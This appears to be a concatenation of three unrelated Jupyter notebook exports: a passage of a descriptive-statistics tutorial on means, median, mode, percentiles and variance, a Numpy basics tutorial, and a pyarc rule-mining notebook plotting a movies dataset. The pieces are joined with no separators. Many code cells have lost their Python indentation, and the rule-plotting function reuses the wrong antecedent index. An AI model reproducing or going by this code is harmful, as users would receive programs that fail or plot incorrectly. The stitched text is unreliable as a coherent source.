If you said 25%, you are wrong. It would be $1.05^5 - 1 \approx 27.63\%$
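A quick sanity check of that figure (an added one-liner, not one of the original cells):
```
print((1.05 ** 5 - 1) * 100)   # ~27.63 percent total return after 5 years
```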
Mathematically, our geometric mean is:
$$ GM(x) = \sqrt[n]{x_1 \times x_2 \times \cdots \times x_n }$$
```
returns = [1.05, 1.06, .98, 1.08]
def product(vals):
'''
This is a function that will multiply every item in the list
together reducing it to a single number. The Pythonic way to
do this would be to use functools.reduce like so:
> from functools import reduce; reduce(lambda x, y: x * y, vals)
We are explicit here for clarity.
'''
prod = 1
for x in vals:
prod = prod * x
return prod
def geometric_mean(vals):
geo_mean = product(vals) ** (1/len(vals)) # raising to 1/n is the same as nth root
return geo_mean
geom = geometric_mean(returns)
geom
```
Using our `product` function above, we can easily multiply all the values together to get what your return after 4 years is:
```
product(returns)
```
or roughly $17.8\%$. Using our geometric mean should give us the same result:
```
geom**4
```
Now look at what happens with the arithmetic mean:
```
arm = arithmetic_mean(returns)
arm
arm**4
```
The arithmetic mean would tell us that after 4 years, we should have an $18.1\%$ return. But we know it should actually be a $17.8\%$ return. It can be tricky to know when to use the arithmetic and geometric means. You also must remember to add the $1$ to your returns or it will not mathematically play nice.
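One way to avoid that mistake is to convert percentage returns into growth factors before taking the geometric mean. Here's a minimal sketch (an addition to the notebook; `pct_returns` is just an illustrative name):
```
pct_returns = [0.05, 0.06, -0.02, 0.08]        # +5%, +6%, -2%, +8%
growth_factors = [1 + r for r in pct_returns]  # the "add 1" step
avg_growth = geometric_mean(growth_factors)
print(avg_growth - 1)                          # average return per period, roughly 4.2%
```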
### 3. Harmonic mean
This one is also a bit tricky to get intuitively. Here we want an average of _rates_. Not to be confused with an average of _returns_. Recall a rate is simply a ratio between two quantities, like the price-to-earnings ratio of a stock or miles-per-hour of a car.
Let's take a look at the mph example. If I have a car that goes 60mph for 50 miles, 50mph for another 50, and 40mph for yet another 50, then the car has traveled 150 miles in $\frac{50mi}{60\frac{mi}{h}} + \frac{50mi}{50\frac{mi}{h}} + \frac{50mi}{40\frac{mi}{h}} = 3.08\bar{3}h$. This corresponds to a harmonic mean of $150mi \div 3.08\bar{3}h \approx 48.648mph$. Much different from our arithmetic mean of 50mph.
(_Note: if in our example the car did not travel a clean 50 miles for every segment, we have to use a_ [weighted harmonic mean](https://en.wikipedia.org/wiki/Harmonic_mean#Weighted_harmonic_mean).)
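Before the formula, here's a quick sketch (not one of the original cells) that redoes that arithmetic directly; `distances` and `segment_speeds` are illustrative names:
```
distances = [50, 50, 50]                # miles per segment
segment_speeds = [60, 50, 40]           # mph per segment
total_time = sum(d / s for d, s in zip(distances, segment_speeds))
print(total_time)                       # ~3.0833 hours
print(sum(distances) / total_time)      # ~48.65 mph overall
```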
Mathematically, the harmonic mean looks like this:
$$ \frac{n}{\frac{1}{x_1}+\frac{1}{x_2}+\cdots+\frac{1}{x_n}} $$
So let's code that up:
```
speeds = [60, 50, 40]
def harmonic_mean(vals):
sum_recip = sum(1/x for x in vals)
return len(vals) / sum_recip
harmonic_mean(speeds)
```
Now you know about the three [Pythagorean means](https://en.wikipedia.org/wiki/Pythagorean_means). Let's now move on to something very important in descriptive statistics:
## The Median
The median should be another familiar statistic, but often misquoted. When somebody is describing a set of numbers with just a mean, they might not be telling the whole story. For example, many sets of values are _skewed_ (a concept we will cover in the histogram section) in that most values are clustered around a certain area but have a long tail. Prices are usually good examples of this. Most wine is around \\$15-20, but we've all seen those super expensive bottles from a hermit's chateau in France. Salaries are also skewed (and politicians like to remind us how far skewed just 1\% of these people are).
A useful statistic in these cases is the "median." The median gives us the middle value, as opposed to the average value. Here's a simple, but illustrative example:
Suppose we take the salaries of 5 people at a bar
[12000, 48000, 72000, 160000, 3360000]
If I told you the average salary in this bar right now is \\$730,400, I'd be telling you the truth. But you can tell that our rich friend pulling in over 3 million is throwing off the curve. When he goes home early to take care of business, the average drops to just \\$73,000. _A full 10 times less_.
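A quick check of those two averages, reusing the `arithmetic_mean` function from above (`bar_salaries` is an illustrative name; the notebook defines the same numbers as `salaries` in the next cell):
```
bar_salaries = [12000, 48000, 72000, 160000, 3360000]
print(arithmetic_mean(bar_salaries))       # 730400.0
print(arithmetic_mean(bar_salaries[:-1]))  # 73000.0 once the top earner leaves
```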
The median instead in this case is much more consistent, or in other words, not as prone to _outliers._ To find the median, we simply take the middle value. Or if there are an even number of entries, we take the average of the two middle values. Here it is in Python:
```
salaries = [12000, 48000, 72000, 160000, 3360000]
def median(vals):
n = len(vals)
sorted_vals = sorted(vals)
midpoint = n // 2
if n % 2 == 1:
return sorted_vals[midpoint]
else:
return arithmetic_mean([sorted_vals[midpoint-1], sorted_vals[midpoint]])
median(salaries)
```
A much more reasonable \\$72,000! Now let's see what happens when Moneybags goes home:
```
median(salaries[:-1])
```
The median drops down to \\$60,000 (which is the average of \\$48,000 and \\$72,000).
Let's take a look at our original `values` list of 10,000 numbers.
```
median(values)
# Recall our values list is even, meaning 506.0 was both item 5000 and 5001
len(values)
# Lopping off the end returns the same value
median(values[:-1])
# Why? There are 9 506s in the list
from collections import Counter
c = Counter(values)
c[506]
```
Above we used the [`Counter`](https://docs.python.org/3.6/library/collections.html#collections.Counter) class in the standard library. This class is a subclass of the `dict` that holds a dictionary of keys to their counts. We can build our own version of it like so:
```
# Here we use the defaultdict that will initialize our first value if it doesn't yet exist
from collections import defaultdict
def make_counter(values):
counts = defaultdict(int)
for v in values:
counts[v] += 1
return counts
counts = make_counter([1, 2, 2, 3, 5, 6, 6, 6])
counts
```
Remember this part because it will show up very soon when we talk about histograms, *the chef's knife of a data scientist's data exploration kitchen*. But first, there's one more descriptive statistic that we should cover.
## The Mode
The mode is simply the most common element. If there are multiple elements tied for the highest count, then there are multiple modes. If all elements have the same count, there are no modes. If the distribution is _continuous_ (meaning it can take uncountably infinite values, which we will discuss in the Distributions chapter), then we use ranges of values to determine the mode. Honestly, I don't really find the mode too useful. A good time to use it is when there's a lot of _categorical data_ (meaning values like "blue", "red", "green" instead of _numerical data_ like 1, 2, 3). You might want to know what color car your dealership has the most of.
Let's take a look at that example now. I've built a set of cars with up to 20 cars of any of four colors.
```
car_colors = ["red"] * random.randint(1,20) + \
["green"] * random.randint(1,20) + \
["blue"] * random.randint(1,20) + \
["black"] * random.randint(1,20)
car_colors
#Using our familiar counter
color_count = Counter(car_colors)
color_count
# We can see the mode above is 'blue' because we have 18. Let's verify:
def mode(counter):
# store a list of name:count tuples in case multiple modes
modes = [('',0)]
for k,v in counter.items():
highest_count = modes[0][1]
if v > highest_count:
modes = [(k,v)]
elif v == highest_count:
modes.append((k,v))
return modes
mode(color_count)
# If we have multiple modes?
mode(Counter(['blue']*3 + ['green']*3 + ['black']*2))
```
But that's enough about modes. Check out Wikipedia if you want more, because there's no point spending more time on them than they're worth.
Hang in there, because we're getting close. Still to come are percentiles, boxplots, and histograms: three very important things.
## Percentiles
A percentile is familiar to anyone who has taken the SAT. It answers the question: what percentage of students are dumber than I am? Well the College Board would love to tell you: congratulations, you're in the 92nd percentile!
Let's take a look at our old friend Mr. `values` with 10,000 numbers from 1-1000. Since this list is _uniformly distributed_, meaning every value is as likely to occur as any other, we expect 25% of the numbers to be below 250, 50% to be below 500, and 75% to be below 750. Let's verify:
```
def percentile(vals, elem):
    '''Returns the fraction of values in vals
    that are less than or equal to elem.
    '''
    count = 0
    sorted_vals = sorted(vals)  # use the argument, not the global `values` list
    for val in sorted_vals:
        if val > elem:
            break
        count += 1
    return count / len(vals)
for num in [250, 500, 750]:
    print("Percentile for {}: {}%".format(num, percentile(values, num)*100))
```
Just like we'd expect. Now if the data set is not so nice and uniform, we expect these values to be quite different. Let's write a function to give us an element at a particular percentile:
```
from math import ceil
def pct_value(vals, pct):
sorted_vals = sorted(vals)
n = len(vals)
return sorted_vals[ceil(n*pct)]
for pct in [.25, .5, .75]:
print("Element at percentile {}%: {}".format(pct*100, pct_value(values, pct)))
```
Notice how the element at the 50th percentile is also our median! Now we have a second definition of the median.
Let's take a look now at a highly skewed set. It will range from 1-99, but we'll cluster it around 10.
```
skewed = []
for i in range(1,100):
skewed += [i]*random.randint(0,int(4+i//abs(10.1-i)))
def print_statistics(vals, calc_mode=True):
print("Count: {}".format(len(vals)))
print("Mean: {:.2f}".format(arithmetic_mean(vals)))
print("Median: {}".format(median(vals)))
if calc_mode: print("Mode: {}".format(mode(Counter(vals))))
print("Max: {}".format(max(vals)))
print("Min: {}".format(min(vals)))
print("Range: {}".format(max(vals)-min(vals)))
for pct in [.25, .5, .75]:
print("{:.0f}th Percentile: {}".format(pct*100, pct_value(vals, pct)))
print("IQR: {}".format(pct_value(vals, 0.75) - pct_value(vals, 0.25)))
print_statistics(skewed)
```
A few clues that this distribution is skewed:
* The mean is significantly different from the median
* The percentiles cluster around 25; for a uniform distribution over this range we'd expect roughly 25, 50, and 75 for those percentiles.
* The max is much higher than the mean, median, or even the 75th percentile.
Let's take a look at a simple plot to describe all of these statistics to us:
## The Boxplot
Also sometimes called the box-and-whisker plot, this is a great way to visualize a lot of the information our `print_statistics` function displayed. In particular, we can see in one graph:
* Median
* 75th percentile (called the third quartile)
* 25th percentile (called the first quartile)
* The reach ($\pm 1.5 \times IQR$), which shows outliers
It does not show the mean, but it can be intuited by looking at the plot. Let's take a look at plots for `values` and `skewed`:
```
sns.boxplot(values)
```
A classic uniform distribution: centered about 500, the median goes right down the middle, and the whiskers are evenly spaced. Now let's take a look at the `skewed` list:
```
sns.boxplot(skewed)
```
Looks pretty different, right? Instead of being centered around 50, it looks like the box is centered around 40. The median is at 27 and much of the box is to the right of it. This shows us that the distribution is skewed to the right.
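To make the "reach" concrete, here's a minimal sketch (an addition, not part of the original notebook) that computes the $\pm 1.5 \times IQR$ fences for `skewed` using the `pct_value` helper from earlier; points beyond the fences are the ones a boxplot draws as individual outlier dots:
```
q1, q3 = pct_value(skewed, 0.25), pct_value(skewed, 0.75)
iqr = q3 - q1
lower_fence, upper_fence = q1 - 1.5 * iqr, q3 + 1.5 * iqr
outliers = [x for x in skewed if x < lower_fence or x > upper_fence]
print("Fences:", lower_fence, upper_fence)
print("Number of points past the fences:", len(outliers))
```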
There's another important way to visualize a distribution and that is
## Histogram
Ah, the moment we've all been waiting for. I keep teaching you ways to describe a dataset, but sometimes a picture is worth a thousand words. That picture is the Histogram.
A histogram is a bar chart in which the values of the dataset are plotted horizontally on the X axis and the _frequencies_ (i.e. how many times that value was seen) are plotted on the Y axis. If you remember our functions to make a counter, a histogram is essentially a chart of those counts.
Think for a minute about what the histogram for our uniform dataset of 10,000 randomly generated numbers would look like. Pretty boring, right?
```
# Seaborn gives an easy way to plot histograms. Plotting from scratch is beyond the
# scope of the programming we will do
sns.distplot(values, kde=False, bins=100)
```
Seaborn's helpful `sns.distplot()` method simply turns a dataset into a histogram for us. The `bins` parameter lets us group values into bins, so that instead of the frequency count of each individual value, we plot the frequency count of a range of values. This is very useful when we have a continuous distribution (i.e. one that can take an infinite number of values over the range), as plotting every individual value is infeasible and would make for an ugly graph.
Let's take a look at our skewed data:
```
sns.distplot(skewed, kde=False, bins=100)
```
The data has a huge spike of values around 10, while the counts everywhere else hover around 4. This type of distribution is called "unimodal" in that it has one peak, or one "contender" for the mode. Practically, unimodal and bimodal distributions are incredibly common.
I'm going to jump ahead to the next notebooks where we generate and describe different types of these distributions, how they're used, and how to describe them. One of the most basic and fundamental distributions in statistics is the unimodal Normal (or Gaussian) distribution. It's the familiar bell curve. Let's use a simple, albeit slow, function to generate numbers according to the normal distribution.
```
from math import sqrt, log, cos, sin, pi
def generateGauss():
    # Box-Muller transform: two uniform samples become two independent standard normal samples
    x1 = random.random() # generate a random float in [0,1.0)
    x2 = random.random()
    y1 = sqrt(-2 * log(x1)) * cos(2 * pi * x2)
    y2 = sqrt(-2 * log(x1)) * sin(2 * pi * x2)
    return y1, y2
gaussValues = []
for _ in range(10000):
    gaussValues += list(generateGauss())
#Let's take a peek:
gaussValues
# and print our statistics
print_statistics(gaussValues, calc_mode=False)
```
The nature of the function is such that the mean should fall around 0. It looks like we accomplished that. Also note how the 25th and 75th percentiles sit roughly the same distance from the median. This is an indication that the distribution is not significantly skewed. Let's take a look at its histogram:
```
sns.distplot(gaussValues, kde=False)
```
Get used to this image because you will see it _everywhere_ in statistics, data science, and life. Even though there are many, many distributions out there (and even more variations on each of those), most people will be happy to apply the "bell curve" to almost anything. Chances are, though, they're right.
## Variability
Let's talk about one more descriptive statistic that describes to us how much the values vary. In other words, if we're looking at test scores, did everyone do about the same? Or were there some big winners and losers?
Mathematicians call this the _variability_. There are three major measures of variability: range, inter-quartile range (IQR), and variance/standard deviation.
### 1. Range
Range is a very simple measure: how far apart could my values possibly be? In our generated datasets above, the answer was pretty obvious. We generated random integers from 1 to 1,000, so the largest possible range is $1000 - 1 = 999$. The values could never fall outside that interval.
But what about our Gaussian values? The standard normal distribution has asymptotic tails instead of hard end points, so it's not so clean. We can see from the graph above that there don't appear to be any values above 4 or below -4, so we'd expect a range of somewhere around 8:
```
print("Max: {}\nMin: {}\nRange: {}".format(
max(gaussValues),
min(gaussValues),
max(gaussValues) - min(gaussValues)))
```
Exactly what we expected. In practice, the range is a good descriptive statistic, but you can't do many other interesting things with it. It basically lets you say "our results were between X and Y", but nothing much more profound.
Another good way to describe the range is called
### 2. Inter-Quartile Range
or IQR for short. This is a similar technique where instead of taking the difference between the max and min values, we take the difference between the 75th and 25th percentile. It gives a good sense of the range because it excludes outliers and tells you where the middle 50% of the values are grouped. Of course, this is most useful when we're looking at a unimodal distribution like our normal distribution, because for a distribution that's bimodal (i.e. has many values at either end of the range), it will be misleading.
Here's how we calculate it:
```
print("75th: {}\n25th: {}\nIQR: {}".format(
pct_value(gaussValues, .75),
pct_value(gaussValues, .25),
pct_value(gaussValues, .75) - pct_value(gaussValues, .25)
))
```
So again, this tells us that 50% of our values are between -0.68 and 0.68, a span of only about 1.35. Comparing this to the full range (which tells us nothing about where most values sit), this gives you the sense that they're bunched around the mean.
If we want a little more predictive power, though, it's time to talk about
### 3. Variance
Variance is a measure of how much values typically deviate (i.e. how far away they are) from the mean.
If we want to calculate the variance, then we first see how far a value is from the mean ($\mu$), square it (which gets rid of the negative), sum them up, and divide by $n$. Essentially, it's an average where the value is the deviation squared instead of the value itself. Here's the formula for variance, denoted by $\sigma^2$:
$$ \sigma^2 = \frac{(x_1 - \mu)^2+(x_2 - \mu)^2+ \cdots + (x_n - \mu)^2}{n} $$
Let's code that up:
```
def variance(vals):
n = len(vals)
m = arithmetic_mean(vals)
variance = 0
for x in vals:
variance += (x - m)**2
return variance/n
variance(gaussValues)
```
The variance for our generated Gaussian numbers is roughly 1, which is another property of a standard normal distribution (mean of 0, variance of 1). So no surprise. But the variance is a bit of a tricky number to intuit because it is the average of the _squared_ differences from the mean. Take our `skewed` list, for example:
```
variance(skewed)
```
How do you interpret this? The max value is 100, so is a variance of 934.8 a lot or a little? Also, let's say the skewed distribution was a measure of price in dollars. Therefore, the units of variance would be 934.8 dollars squared. Doesn't make a whole lot of sense.
For this reason, most people will take the square root of the variance to give them a value called the **standard deviation**: $\sigma = \sqrt{\sigma^2}$.
```
def stddev(vals):
return sqrt(variance(vals))
stddev(skewed)
```
This is much more approachable. It's saying the standard deviation from our mean is about \\$30. That is an easy number to digest. This is a very important number to be able to grok. I'll repeat it to drive the point home:
The _standard deviation_ is a measure of how "spread out" a distribution is. The higher the value, the further a typical observation from our population is from the mean of that population.
The standard deviation, range, and IQR all measure this dispersion of a distribution. However, for reasons we will see later, the standard deviation is the workhorse of them all. By knowing the standard deviation of a population (or sample, as the case often is), we can begin to judge how likely a value is to occur, or how sure we are of our own guesses. Statistics is a glorified guessing game, and stddev is one of the most important tools.
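As a closing sketch (an addition, not part of the original notebook): when your data is a sample rather than the whole population, the usual convention is to divide by $n - 1$ (Bessel's correction) instead of $n$:
```
def sample_variance(vals):
    n = len(vals)
    m = arithmetic_mean(vals)
    return sum((x - m) ** 2 for x in vals) / (n - 1)   # note the n - 1

def sample_stddev(vals):
    return sqrt(sample_variance(vals))

# with 20,000 generated values the difference from our population stddev is tiny
print(stddev(gaussValues), sample_stddev(gaussValues))
```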
---
## Outlook
Some of the topics to look forward to are:
* Paired data
* **Scatter plots**
* Explanatory vs response variables
* **Covariance and correlation**
* Random Variables and Probability
* **Distributions**
* Discrete vs Continuous
* Descriptive statistics of distributions
* Major types of distributions
* Normal
* Geometric
* Binomial
* Poisson
* Chi-squared
* Weibull
* **Inferential statistics**
* Sampling distributions and statistics
* Central limit theorem
* Hypothesis testing
# Numpy
Numpy (Numerical Python) is an open-source library in Python for performing scientific computations. It lets us work with arrays and matrices in a more natural way than lists, where we have to loop through individual elements to perform a numerical operation.
As a refresher, here are basic descriptions of arrays and matrices:
- Arrays are simply a collection of values of the same type, indexed by integers--think of a list
- Matrices are multi-dimensional arrays indexed by rows, columns and dimensions--think of nested lists
When doing mathematical operations, usage of the Numpy library is highly recommended because it is designed with high performance in mind--Numpy is largely written in C, which makes computations much faster than plain Python code. In addition, Numpy arrays are stored more efficiently than equivalent data structures in Python such as lists and arrays.
Numpy is a third-party module, which means it is not part of Python's suite of built-in libraries. You don't have to worry about this since this is already in the environment we have set up for you.
**Import**
To use numpy, we have to import it first.
```
import numpy as np
```
`as` keyword allows us to create an alias for our imported library. In this case, we renamed `numpy` to `np`. This is a common naming convention for numpy. You'll see almost all implementations using numpy on the web using this alias.
We can also do the following to check its version.
```
print(np.__version__)
```
**Numpy Array Basics**
Some notes on numpy arrays:
- all elements in a numpy array must be of the same type.
- the size cannot be changed once constructed.
- support “vectorized” operations such as element-wise addition and multiplication (see the quick sketch below).
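Here's a small sketch of what "vectorized" means in practice and why it tends to be much faster than looping in Python (the timings are only illustrative and will vary by machine):
```
import time
import numpy as np

py_list = list(range(1000000))
np_arr = np.arange(1000000)

t0 = time.perf_counter()
doubled_list = [x * 2 for x in py_list]   # explicit Python loop
t1 = time.perf_counter()
doubled_arr = np_arr * 2                  # one vectorized operation, no explicit loop
t2 = time.perf_counter()

print("list comprehension: {:.4f}s".format(t1 - t0))
print("numpy vectorized:   {:.4f}s".format(t2 - t1))
```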
## 1. Attributes
Numpy has built-in attributes that we can use. Here are some of them:
- ndarray.ndim - number of axes or dimensions of the array.
- ndarray.shape - the dimension of the array--a tuple of integers indicating the size of the array in each dimension.
- ndarray.dtype - the type of the elements in the array. Numpy provides its own `int16`, `int32`, `float64` data types, among others.
- ndarray.itemsize - size in bytes of each element of the array. For example, an array of elements of type `float64` has itemsize of $\frac{64}{8} = 8$ and `int32` has itemsize of $\frac{32}{8} = 4$.
```
arr = np.array([1, 2, 3, 4], dtype=float)
print('Type: ',type(arr))
print('Shape: ',arr.shape)
print('Dimension: ',arr.ndim)
print('Itemsize: ',arr.itemsize)
print('Size: ',arr.size)
```
**Mixed data types**
If we try to construct a numpy array from a list with mixed data types, it will automatically treat all the elements as strings. But if we force it into a numeric data type, say `float`, it will raise an error (see the sketch after the next cell).
```
arr = np.array([1, 2.0, "dsi"]) # notice that we did not pass an argument to dtype parameter
print("Datatype: ", arr.dtype)
```
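And the error case, sketched with a try/except so the cell still runs (the exact message may differ across Numpy versions):
```
try:
    np.array([1, 2.0, "dsi"], dtype=float)
except ValueError as e:
    print("ValueError:", e)
```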
## 2. Creating Arrays
The following are different ways of creating an array in Numpy aside from passing a list as seen in the examples above.
**np.arange**
arange creates an array based on the arguments passed. If only a single argument is passed--let's call it `n1`--it creates an array of size `n1` with values running from 0 to `n1`-1. If two arguments (`n1` and `n2`) are passed, it creates an array running from `n1` to `n2`-1.
```
np.arange(5, dtype=float)
np.arange(2, 5, dtype=float)
```
**np.ones** and **np.zeros**
Create arrays filled with 1s and 0s, respectively.
```
np.ones(4)
np.zeros(4)
```
**np.linspace**
Creates an array of evenly spaced values over a given interval.
```
np.linspace(1, 10, 10, dtype=float)
np.linspace(1, 10, 4, dtype=float)
```
**np.ones_like** and **np.zeros_like**
Create arrays of 1s and 0s with the same shape as the input array/matrix.
```
arr = np.array([[1, 2, 3], [4, 5, 6]])
np.ones_like(arr)
np.zeros_like(arr)
```
**np.diag**
Creates a diagonal matrix from a 1-d array of values.
```
arr = [1, 5, 4]
np.diag(arr)
```
**np.random**
Creates an array/matrix of random values.
```
np.random.randint(0, 10, size=(2, 3)) # matrix with dimension 2x3 containing integer values ranging from 0-9
np.random.random(size=(2, 3)) # matrix with dimension 2x3 containing float values ranging from 0-1
```
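If you want these random examples to be reproducible from run to run, you can seed Numpy's generator first (an optional step, not in the original cells):
```
np.random.seed(42)                     # fix the seed for reproducibility
np.random.randint(0, 10, size=(2, 3))  # the same matrix every time this cell is run with this seed
```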
## 3. Accessing and Manipulating Arrays
Numpy allows us to do manipulations on an array/matrix.
**Indexing** and **Slicing**
This is similar to how you index/slice a list.
```
arr = np.arange(3, 10)
arr[6]
arr[:4]
```
We can also indicate the step size by adding another colon `:` and an integer after the slice.
```
arr[:4:2]
```
**Reshaping**
To reshape a matrix in Numpy, we use the `reshape()` method. It accepts the new dimensions of the matrix after transformation (either as separate integers, as below, or as a tuple).
```
arr = np.arange(10)
arr.reshape(5, 2)
arr.reshape(2, 5)
```
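A small side note (not in the original cells): `reshape` also accepts an actual tuple, and you can pass -1 to let Numpy infer one of the dimensions:
```
arr = np.arange(10)
arr.reshape((5, 2))  # same result as arr.reshape(5, 2)
arr.reshape(2, -1)   # -1 tells Numpy to work out the second dimension (here 5)
```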
**Concatenating**
We use the following methods in Numpy to do concatenation:
- `np.concatenate()` - joins 1-dimensional arrays
- `np.hstack()` - joins multi-dimensional arrays on the horizontal axis
- `np.vstack()` - joins multi-dimensional arrays on the vertical axis
```
arr1 = np.arange(5)
arr2 = np.arange(5, 10)
arr3 = np.arange(10, 15)
np.concatenate([arr1, arr2])
np.concatenate([arr1, arr2, arr3])
arr1 = np.random.random((2,1))
arr2 = np.random.random((2,3))
print('Array 1:\n', arr1)
print('Array 2:\n', arr2)
np.hstack([arr1, arr2])
arr1 = np.random.random((1,2))
arr2 = np.random.random((4,2))
print('Array 1:\n', arr1)
print('Array 2:\n', arr2)
np.vstack([arr1, arr2])
```
**Splitting**
This is just the opposite of the concatenation methods we've seen earlier. The following are the methods we use:
- `np.split()` - splits a 1-dimensional array. The first argument is the array we want to split. The second argument is a tuple of indices where we want the array to be split.
- `np.hsplit()` - splits a multi-dimensional array on the horizontal axis
- `np.vsplit()` - splits a multi-dimensional array on the vertical axis
```
arr = np.arange(10)
np.split(arr, (1, 3, 6))
arr = np.arange(20)
np.split(arr, (1, 10))
arr = np.random.random((6,5))
arr
arr1, arr2 = np.hsplit(arr, [2])
print('Split 1:\n', arr1)
print('Split 2:\n', arr2)
arr1, arr2, arr3 = np.vsplit(arr, [1,3])
print('Split 1:\n', arr1)
print('Split 2:\n', arr2)
print('Split 3:\n', arr3)
```
## 4. Matrix Operations
### 4.1 Arithmetic Operations
We can perform arithmetic operations on Numpy matrices as in linear algebra. Be careful of the dimensions! Make sure there is no mismatch for the particular operation you are using (see the error sketch after the next cell).
```
arr1 = np.arange(9).reshape((3,3))
arr2 = np.ones(9).reshape((3,3))
arr1 + arr2
arr1 - arr2
arr1 * arr2 # note that this is an element-wise multiplication
arr1 / arr2 # note that this is an element-wise division
```
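Here's what a dimension mismatch looks like, wrapped in a try/except so the cell still runs (the exact wording of the error may vary by Numpy version):
```
arr3 = np.ones((2, 3))
try:
    arr1 + arr3   # (3, 3) + (2, 3): shapes cannot be broadcast together
except ValueError as e:
    print("ValueError:", e)
```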
To do a proper matrix multiplication, we use the `np.dot` method.
```
np.dot(arr1, arr2)
```
### 4.2 Broadcasting
Broadcasting allows us to perform an arithmetic operation on a whole matrix using a scalar value. For example:
```
arr = np.arange(9).reshape((3,3))
arr
arr + 5
```
Notice that all the elements in the array have increased by 5. We can also do this for other arithmetic operations.
```
arr - 5
arr * 5
arr / 5
```
We can also broadcast using a 1-d array.
```
arr1 = np.arange(12).reshape((4,3))
arr2 = np.ones(3)/2 # a 1-d array of 0.5s (np.ones(3) divided by the scalar 2)
arr1
arr2
arr1 - arr2
arr1 * arr2
```
### 4.3 Other functions
Here are other useful methods that we typically use:
**Transpose**
This swaps the rows and columns of the original matrix.
```
arr = np.arange(12).reshape((4,3))
arr
arr.T
```
**Aggregation methods**
We can use methods like sum, max, min, and std.
```
arr = np.arange(12).reshape((4,3))
arr.sum()
```
We can also specify which dimension to use for the aggregation.
```
arr.sum(axis=0)
arr.sum(axis=1)
arr.max()
arr.max(axis=0)
arr.min()
arr.std()
arr.std(axis=1)
```
```
%run ../../main.py
%matplotlib inline
from pyarc import CBA, TransactionDB
from pyarc.algorithms import generateCARs, M1Algorithm, M2Algorithm
from pyarc.algorithms import createCARs
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from itertools import combinations
import itertools
import pandas as pd
import numpy
import re
movies = pd.read_csv("../data/movies.csv", sep=";")
movies_discr = movies.copy(True)
budget_bins = range(0, 350, 50)
budget_bins_names = [ "<{0};{1})".format(i, i + 50) for i in budget_bins[:-1] ]
celebrities_bins = range(0, 10, 2)
celebrities_bins_names = [ "<{0};{1})".format(i, i + 2) for i in celebrities_bins[:-1] ]
movies_discr['estimated-budget'] = pd.cut(movies['estimated-budget'], budget_bins, labels=budget_bins_names)
movies_discr['a-list-celebrities'] = pd.cut(movies['a-list-celebrities'], celebrities_bins, labels=celebrities_bins_names)
movies_discr.to_csv("../data/movies_discr.csv", sep=";")
transactionDB = TransactionDB.from_DataFrame(movies_discr, unique_transactions=True)
rules = generateCARs(transactionDB, support=5, confidence=50)
movies_vals = movies.get_values()
x = range(0, 350, 50)
y = range(1, 9)
x_points = list(map(lambda n: n[0], movies_vals))
y_points = list(map(lambda n: n[1], movies_vals))
data_class = list(movies['class'])
appearance = {
'box-office-bomb': ('brown', "o"),
'main-stream-hit': ('blue', "o"),
'critical-success': ('green', "o")
}
rule_appearance = {
'box-office-bomb': 'tan',
'main-stream-hit': 'aqua',
'critical-success': 'lightgreen'
}
plt.style.use('seaborn-white')
rules
len(transactionDB)
def plot_rule(qrule, plt):
interval_regex = "(?:<|\()(\d+(?:\.(?:\d)+)?);(\d+(?:\.(?:\d)+)?)(?:\)|>)"
lower_y = 0
area_y = celebrities_bins[-1]
lower_x = 0
area_x = budget_bins[-1]
antecedent = qrule.new_antecedent
if len(antecedent) != 0:
if antecedent[0][0] == "a-list-celebrities":
y = antecedent[0]
y_boundaries = re.search(interval_regex, y[1].string())
lower_y = float(y_boundaries.group(1))
upper_y = float(y_boundaries.group(2))
area_y = upper_y - lower_y
axis = plt.gca()
else:
x = antecedent[0]
x_boundaries = re.search(interval_regex, x[1].string())
lower_x = float(x_boundaries.group(1))
upper_x = float(x_boundaries.group(2))
area_x = upper_x - lower_x
if len(antecedent) > 1:
if antecedent[1][0] == "a-list-celebrities":
y = antecedent[0]
y_boundaries = re.search(interval_regex, y[1].string())
lower_y = float(y_boundaries.group(1))
upper_y = float(y_boundaries.group(2))
area_y = upper_y - lower_y
axis = plt.gca()
else:
x = antecedent[1]
x_boundaries = re.search(interval_regex, x[1].string())
lower_x = float(x_boundaries.group(1))
upper_x = float(x_boundaries.group(2))
area_x = upper_x - lower_x
axis = plt.gca()
class_name = qrule.rule.consequent[1]
axis.add_patch(
patches.Rectangle((lower_x, lower_y), area_x, area_y, zorder=-2, facecolor=rule_appearance[class_name], alpha=qrule.rule.confidence)  # assumes the rule's confidence lives on qrule.rule, like the consequent above
)
plt.figure(figsize=(10, 5))
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
plt.xlabel('Estimated Budget (1000$)', fontsize=20)
plt.ylabel('A-List Celebrities', fontsize=20)
plt.savefig("../data/datacases.png")
print("rule count", len(rules))
movies_discr.head()
plt.figure(figsize=(10, 5))
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel('Estimated Budget (1000$)', fontsize=20)
plt.ylabel('A-List Celebrities', fontsize=20)
plt.savefig("../data/datacases_discr.png")
print("rule count", len(rules))
from matplotlib2tikz import save as tikz_save
subplot_count = 1
plt.style.use("seaborn-white")
fig, ax = plt.subplots(figsize=(40, 60))
ax.set_xlabel('Estimated Budget (1000$)')
ax.set_ylabel('A-List Celebrities')
for idx, r in enumerate(sorted(rules, reverse=True)):
plt.subplot(7, 4, idx + 1)
plot_rule(r, plt)
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=30)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("r{}".format(idx), fontsize=40)
plt.savefig("../data/rule_plot.png")
print(len(transactionDB))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clf = M1Algorithm(rules, transactionDB).build()
for r in clf.rules:
plot_rule(r, plt)
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
